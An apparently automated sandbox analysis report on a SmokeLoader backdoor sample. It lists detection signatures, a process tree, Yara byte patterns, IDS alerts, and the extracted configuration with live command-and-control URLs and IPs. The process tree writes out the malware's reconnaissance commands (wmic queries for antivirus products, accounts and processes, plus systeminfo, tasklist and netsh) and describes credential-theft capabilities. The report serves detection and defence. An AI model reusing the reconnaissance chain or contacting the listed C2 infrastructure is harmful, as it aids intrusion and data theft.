Windows Analysis Report
bCnarg2O62.exe

Overview

General Information

Sample name: bCnarg2O62.exe (renamed because the original name is a hash value)
Original sample name: fa949a7589dc71ea006eb10ad025618a.exe
Analysis ID: 1528498
MD5: fa949a7589dc71ea006eb10ad025618a
SHA1: 3525508cc8b83cdec2bde0bf0cbdc7cdab62c383
SHA256: fff79a1e96ffcac77b3eb7bc01706bfece7499ab8972b28a732dfa2aa09994ee
Tags: exe, Stealc, user-abuse_ch

Detection

Family: SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the windows firewall
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • bCnarg2O62.exe (PID: 1612 cmdline: "C:\Users\user\Desktop\bCnarg2O62.exe" MD5: FA949A7589DC71EA006EB10AD025618A)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • 1D0F.exe (PID: 1308 cmdline: C:\Users\user\AppData\Local\Temp\1D0F.exe MD5: 02F50094664F74B387AC57B1DE8679AF)
      • 9245.exe (PID: 6520 cmdline: C:\Users\user\AppData\Local\Temp\9245.exe MD5: 65AEAA0A0849CB3CE9BC15BCBF0B7B9F)
        • cmd.exe (PID: 2688 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 352 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3192 cmdline: wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 1852 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3912 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 504 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 5700 cmdline: wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3664 cmdline: wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3844 cmdline: wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 1260 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 5628 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 2912 cmdline: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6272 cmdline: wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6484 cmdline: wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 5772 cmdline: wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • ipconfig.exe (PID: 2032 cmdline: ipconfig /displaydns MD5: 62F170FB07FDBB79CEB7147101406EB8)
          • ROUTE.EXE (PID: 1712 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)
          • netsh.exe (PID: 6340 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • systeminfo.exe (PID: 2600 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • tasklist.exe (PID: 2080 cmdline: tasklist /v /fo csv MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • explorer.exe (PID: 2140 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 5652 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 5368 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 5292 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 2164 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 4128 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • derhswe (PID: 2412 cmdline: C:\Users\user\AppData\Roaming\derhswe MD5: FA949A7589DC71EA006EB10AD025618A)
  • derhswe (PID: 888 cmdline: C:\Users\user\AppData\Roaming\derhswe MD5: FA949A7589DC71EA006EB10AD025618A)
  • jfrhswe (PID: 332 cmdline: C:\Users\user\AppData\Roaming\jfrhswe MD5: 02F50094664F74B387AC57B1DE8679AF)
  • msiexec.exe (PID: 7044 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup
Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body.
Attribution:
  • SMOKY SPIDER
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
Extracted malware configuration:
{"Version": 2022, "C2 list": ["https://ninjahallnews.com/search.php", "https://fallhandbat.com/search.php"]}
Source | Rule | Description | Author | Strings
00000005.00000002.2045303884.000000000050C000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x12b5e:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader | Yara detected SmokeLoader | Joe Security
00000007.00000002.2263785204.0000000000710000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000007.00000002.2263785204.0000000000710000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown
  • 0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000008.00000002.2520233894.000000000073D000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x11df7:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
(5 of 29 Yara entries shown)

System Summary

Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\user\AppData\Roaming\derhswe, CommandLine: C:\Users\user\AppData\Roaming\derhswe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\derhswe, NewProcessName: C:\Users\user\AppData\Roaming\derhswe, OriginalFileName: C:\Users\user\AppData\Roaming\derhswe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\derhswe, ProcessId: 2412, ProcessName: derhswe
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2688, ParentProcessName: cmd.exe, ProcessCommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , ProcessId: 2912, ProcessName: WMIC.exe
Source: Process started | Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' | Data: Command: route print, CommandLine: route print, CommandLine|base64offset|contains: , Image: C:\Windows\System32\ROUTE.EXE, NewProcessName: C:\Windows\System32\ROUTE.EXE, OriginalFileName: C:\Windows\System32\ROUTE.EXE, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2688, ParentProcessName: cmd.exe, ProcessCommandLine: route print, ProcessId: 1712, ProcessName: ROUTE.EXE
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T00:19:56.521297+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 109.175.29.39 | 80 | TCP
2024-10-08T00:19:57.933998+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 109.175.29.39 | 80 | TCP
2024-10-08T00:19:58.702026+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 109.175.29.39 | 80 | TCP
2024-10-08T00:19:59.466827+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:00.843226+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:01.602248+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:02.373195+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49742 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:03.357049+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49743 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:04.230689+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:05.016635+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49745 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:05.782303+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49746 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:06.621612+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49747 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:07.425060+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:08.187550+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:08.988328+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49750 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:09.999180+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49751 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:10.795484+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49752 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:11.585121+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49753 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:12.351541+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49754 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:13.116137+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49755 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:14.108812+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49756 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:14.977527+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49757 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:15.765843+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49758 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:16.759382+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49759 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:19.925424+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49761 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:20.864927+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49762 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:21.652306+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49763 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:22.408715+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49764 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:23.179852+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49765 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:23.967118+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49767 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:24.908316+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49773 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:26.073161+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49774 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:26.858013+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49786 | 109.175.29.39 | 80 | TCP
2024-10-08T00:20:42.524219+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49882 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:43.856995+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49890 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:44.985987+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49898 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:45.842246+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49902 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:46.708528+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49913 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:47.583687+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49919 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:49.538695+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49925 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:50.760609+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49931 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:51.653515+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49941 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:52.681299+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49948 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:53.570072+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49954 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:55.270683+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49960 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:56.144229+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49966 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:57.019675+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49972 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:57.887464+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49978 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:58.778951+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49984 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:59.634156+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 49994 | 23.145.40.168 | 443 | TCP
2024-10-08T00:21:01.242575+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 50001 | 23.145.40.168 | 443 | TCP
2024-10-08T00:21:02.152391+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 50007 | 23.145.40.168 | 443 | TCP
2024-10-08T00:21:03.074243+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 50013 | 23.145.40.168 | 443 | TCP
2024-10-08T00:21:11.009960+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 50050 | 23.145.40.168 | 443 | TCP
2024-10-08T00:21:33.567262+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 50057 | 109.175.29.39 | 80 | TCP
2024-10-08T00:21:35.197944+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 50058 | 109.175.29.39 | 80 | TCP
2024-10-08T00:21:37.723611+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 50059 | 109.175.29.39 | 80 | TCP
2024-10-08T00:21:39.805320+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 50060 | 109.175.29.39 | 80 | TCP
2024-10-08T00:21:52.355257+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 50061 | 109.175.29.39 | 80 | TCP
2024-10-08T00:22:08.472860+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 50062 | 109.175.29.39 | 80 | TCP
2024-10-08T00:22:27.583209+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 50063 | 23.145.40.168 | 443 | TCP
2024-10-08T00:22:30.172982+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 50064 | 211.171.233.129 | 80 | TCP
2024-10-08T00:22:49.728426+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 50065 | 23.145.40.168 | 443 | TCP
2024-10-08T00:22:52.888320+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 50066 | 211.171.233.129 | 80 | TCP
2024-10-08T00:23:14.226648+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 50067 | 23.145.40.168 | 443 | TCP
2024-10-08T00:23:20.288275+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.4 | 50068 | 211.171.233.129 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T00:20:42.888093+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49882 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:44.200827+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49890 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:45.235539+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49898 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:46.119294+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49902 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:46.993552+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49913 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:47.872357+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49919 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:49.815775+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49925 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:51.040714+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49931 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:51.921800+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49941 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:52.967975+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49948 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:53.854687+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49954 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:55.555195+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49960 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:56.434723+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49966 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:57.296278+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49972 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:58.168391+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49978 | 23.145.40.168 | 443 | TCP
2024-10-08T00:20:59.035838+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49984 | 23.145.40.168 | 443 | TCP
2024-10-08T00:21:00.185280+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49994 | 23.145.40.168 | 443 | TCP
2024-10-08T00:21:01.521449+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50001 | 23.145.40.168 | 443 | TCP
2024-10-08T00:21:02.425405+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50007 | 23.145.40.168 | 443 | TCP
2024-10-08T00:21:03.346072+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50013 | 23.145.40.168 | 443 | TCP
2024-10-08T00:22:27.911815+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50063 | 23.145.40.168 | 443 | TCP
2024-10-08T00:22:50.083810+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50065 | 23.145.40.168 | 443 | TCP
2024-10-08T00:23:14.580007+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50067 | 23.145.40.168 | 443 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T00:20:43.053544+0200 | 2829848 | 2 | Potentially Bad Traffic | 23.145.40.168 | 443 | 192.168.2.4 | 49882 | TCP


AV Detection

Source: bCnarg2O62.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\derhswe | Avira: detection malicious, Label: HEUR/AGEN.1310247
Source: C:\Users\user\AppData\Local\Temp\1D0F.exe | Avira: detection malicious, Label: HEUR/AGEN.1310247
Source: C:\Users\user\AppData\Roaming\jfrhswe | Avira: detection malicious, Label: HEUR/AGEN.1310247
Source: 00000007.00000002.2263785204.0000000000710000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["https://ninjahallnews.com/search.php", "https://fallhandbat.com/search.php"]}
Source: C:\Users\user\AppData\Roaming\derhswe | ReversingLabs: Detection: 39%
Source: bCnarg2O62.exe | ReversingLabs: Detection: 39%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\derhswe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1D0F.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\jfrhswe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9245.exe | Joe Sandbox ML: detected
Source: bCnarg2O62.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9245.exe | Code function: 10_2_00007FF7327A36F0 CryptExportKey,CryptExportKey,10_2_00007FF7327A36F0
Source: C:\Users\user\AppData\Local\Temp\9245.exe | Code function: 10_2_00007FF7327A3220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,10_2_00007FF7327A3220
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_030F3098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,12_2_030F3098
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_030F3717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,12_2_030F3717
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_030F3E04 RtlCompareMemory,CryptUnprotectData,12_2_030F3E04
